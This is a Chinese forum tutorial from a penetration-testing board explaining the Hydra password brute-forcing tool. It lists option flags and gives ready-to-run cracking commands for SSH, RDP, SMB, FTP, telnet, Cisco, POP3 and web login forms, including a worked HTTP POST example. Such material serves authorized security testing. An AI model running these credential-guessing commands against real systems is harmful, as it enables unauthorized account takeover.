Hydra(爆破密码)使用方法

Eternaler 6月前 100

这个也是backtrack下面很受欢迎的一个工具

参数详解:

-R 根据上一次进度继续破解

-S 使用SSL协议连接

-s 指定端口

-l 指定用户名

-L 指定用户名字典(文件)

-p 指定密码破解

-P 指定密码字典(文件)

-e 空密码探测和指定用户密码探测(ns)

-C 用户名可以用:分割(username:password)可以代替-l username -p password

-o 输出文件

-t 指定多线程数量,默认为16个线程

-vV 显示详细过程

server 目标IP

service 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2......)

使用案例:

使用hydra破解ssh的密码

1
hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh

破解https:

1
# hydra -m /index.php -l username -P pass.txt IP https

破解teamspeak:

1
# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

破解cisco:

1
2
# hydra -P pass.txt IP cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

破解smb:

1
# hydra -l administrator -P pass.txt IP smb

破解pop3:

1
# hydra -l muts -P pass.txt my.pop3.mail pop3

破解rdp:

1
# hydra IP rdp -l administrator -P pass.txt -V

破解http-proxy:

1
# hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解telnet

1
# hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

破解ftp:

1
2
# hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
# hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV

get方式提交,破解web登录:

1
2
# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/
# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.php

post方式提交,破解web登录:

  该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下:

1
2
3
4
5
<form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">
</form>

  假设有以上一个密码登录表单,我们执行命令:

1
# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”

  说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。

  后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义。

帖子版权声明 1、本帖标题:Hydra(爆破密码)使用方法
    本站网址:http://bbs.tiger2019.cn/
2、本网站的资源部分来源于网络,如有侵权,请联系站长进行删除处理。
3、会员发帖仅代表会员个人观点,并不代表本站赞同其观点和对其真实性负责。
4、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
5、站长邮箱:Administrator@tiger2019.cn 除非注明,本帖由Eternaler在本站《渗透测试》版块原创发布, 转载请注明出处!
最新回复 (0)
返回